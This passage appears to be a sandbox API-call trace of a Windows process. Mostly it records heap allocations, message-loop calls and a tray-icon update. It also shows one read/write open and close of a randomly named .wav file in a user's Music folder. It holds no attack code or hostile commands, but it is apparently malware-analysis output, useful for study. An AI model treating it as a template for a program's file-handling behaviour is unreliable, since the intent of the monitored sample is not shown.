lpMultiByteStr=0x906f38, cbMultiByte=106, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", lpUsedDefaultChar=0x0) returned 106 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.264] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\ftar8k3covo_ce7d.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0182.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=106, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd4) returned 0x8feba8 [0182.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=106, lpWideCharStr=0x8feba8, cchWideChar=106 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav") returned 106 [0182.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8fff00 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.267] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0182.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.269] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 1 [0182.269] TranslateMessage (lpMsg=0x87f3fc) returned 0 [0182.269] DispatchMessageW (lpMsg=0x87f3fc) returned 0x0 [0182.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.269] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea98) returned 1 [0182.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.270] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0182.270] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0182.270] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0182.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0182.271] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0182.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0182.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0182.272] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.273] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0182.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.273] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0182.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0182.274] CloseHandle (hObject=0x138) returned 1 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0182.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0182.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.277] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.277] 